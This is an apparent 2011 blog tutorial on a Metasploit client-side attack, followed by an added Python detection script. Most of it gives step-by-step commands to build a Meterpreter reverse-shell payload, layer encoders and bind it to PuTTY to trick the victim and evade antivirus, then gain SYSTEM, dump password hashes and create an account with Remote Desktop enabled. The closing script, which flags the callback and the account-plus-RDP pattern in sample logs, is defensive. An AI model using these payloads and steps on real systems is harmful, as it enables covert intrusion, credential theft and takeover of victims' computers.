In this tutorial I will show a basic Metasploit client-side attack. In our case I will send a payload bound to an executable file to the victim. If the victim opens the file, the payload will be executed and it will give us a back-connection to our Meterpreter listener.
Type cd /pentest/exploits/framework in your terminal.
This navigates to Metasploit's folder. OK, to generate a payload, type the command:
msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 x > /root/payload.exe
To get your WAN IP address, just go to http://www.cmyip.com/
windows/meterpreter/reverse_tcp is the payload we are going to use; on execution it gives us a TCP Meterpreter session.
Now you can see an executable file in your root folder named "payload.exe". Next we have to send this executable to the victim.
In our case I'm using a FUD binder to bind the payload with another executable file (I'm using PuTTY, an SSH client) to fool the victim and to evade antivirus.
You can use any FUD binder or crypter, but make sure you don't corrupt the file.
Or you can even use Metasploit's built-in crypter, known as "msfencode". If you wish to use that, your command will be:
msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 R | ruby msfencode -t exe -e x86/shikata_ga_nai > /root/payload.exe
But it is still detected by AVs. Well, you can even chain multiple encoders like this:
msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/msfpayload.exe
Still detected by a few AVs; or you can try different combinations. To see the list of available encoders type "msfencode -h". If it doesn't work, try hex editing after encoding.
OK, before sending the file to the victim we need to set up a listener to receive the Meterpreter session when the victim executes the file. For that, open up msfconsole; since we are already in the Metasploit folder, just type:
msfconsole
And then type:
use exploit/multi/handler
For the payload, type:
set PAYLOAD windows/meterpreter/reverse_tcp
This time for LHOST use your LAN IP; type "ifconfig" in another terminal to find it.
So the command will be like:
set LHOST 192.168.1.xxx
And for LPORT:
set LPORT 4444
OK, done. Now type:
exploit
That's it; now our listener will wait for any incoming connections on port 4444.
Don't forget to port forward port "4444" on your router to your "LAN IP".
After port forwarding, check your port using this website: http://canyouseeme.org/
OK, now our victim has executed putty.exe (the program bound to my payload); within seconds our listener will give us a Meterpreter session. That's it, we own the system now.
Now a simple hack using Meterpreter: we will create a user account and enable Remote Desktop on the victim's system.
Type "help" to see the list of all commands and their descriptions.
Type these commands to get SYSTEM:
use priv
getsystem
To check your privilege level:
getuid
To dump hashes, type "hashdump". Just play around with all the commands.
OK, now we will enable Remote Desktop on the victim's computer; for that:
run getgui -u username -p password
Now open up a new terminal and type the command:
rdesktop -u username -p password victim's-ip
If you wish to delete the user accounts after using RDP,
After you are done with it, type "exit" to exit the session.
OK, for those trying to test this within VirtualBox: make sure you have a VPN installed (like Hotspot Shield) in the Windows box, and remember, for LHOST use your WAN IP for the payload and your LAN IP for the listener. Very important: port forward your router to BackTrack's LAN IP on port 4444.
That's it, a basic client-side exploitation.
Thanks for reading my tutorial!
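From the defender's side, the walkthrough above leaves two footprints on the victim host: an outbound connection to the handler's port from a user-launched program, and a local account created moments before Remote Desktop is switched on. The following Python script is an added illustration, not part of the original tutorial, that picks both patterns out of host telemetry; the key=value log format, the host and account names, and the use of the fDenyTSConnections registry value as the "RDP enabled" signal are constructed assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs): one event per line, space-separated key=value fields.
SAMPLE_LOG = """\
2011-10-31T05:40:02 host=WS01 type=netconn proc=putty.exe dport=4444 dst=203.0.113.10
2011-10-31T05:40:40 host=WS01 type=event id=4720 target=helpdesk2
2011-10-31T05:40:42 host=WS01 type=regset value=fDenyTSConnections data=0
2011-10-31T06:15:00 host=WS02 type=event id=4720 target=newhire
2011-10-31T07:30:00 host=WS02 type=netconn proc=firefox.exe dport=443 dst=198.51.100.7
"""

HANDLER_PORT = "4444"          # port the tutorial's multi/handler listens on
WINDOW = timedelta(minutes=5)  # max gap between account creation and RDP being enabled

def parse(log):
    """Turn each line into a dict of fields; the first token is the ISO timestamp."""
    events = []
    for line in log.splitlines():
        ts, _, rest = line.partition(" ")
        ev = dict(f.split("=", 1) for f in rest.split())
        ev["ts"] = datetime.fromisoformat(ts)
        events.append(ev)
    return events

def callback_alerts(events, port=HANDLER_PORT):
    """Any process opening an outbound connection to the handler port."""
    return [(e["host"], e["proc"], e["dst"]) for e in events
            if e["type"] == "netconn" and e["dport"] == port]

def getgui_alerts(events, window=WINDOW):
    """Account creation (Windows event 4720) followed on the same host, within the
    window, by fDenyTSConnections set to 0: the footprint getgui leaves behind."""
    created = defaultdict(list)
    for e in events:
        if e["type"] == "event" and e["id"] == "4720":
            created[e["host"]].append(e)
    alerts = []
    for e in events:
        if e["type"] == "regset" and e["value"] == "fDenyTSConnections" and e["data"] == "0":
            for c in created[e["host"]]:
                if timedelta(0) <= e["ts"] - c["ts"] <= window:
                    alerts.append((e["host"], c["target"]))
    return alerts

if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    print("callbacks:", callback_alerts(evs))    # [('WS01', 'putty.exe', '203.0.113.10')]
    print("getgui-like:", getgui_alerts(evs))    # [('WS01', 'helpdesk2')]
```

The second host shows why the time window matters: a routine account creation with no RDP change nearby produces no alert.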
Monday, October 31, 2011
Metasploit Framework tutorial - part 4 (Client Side attack)
5:41 AM
Anonymous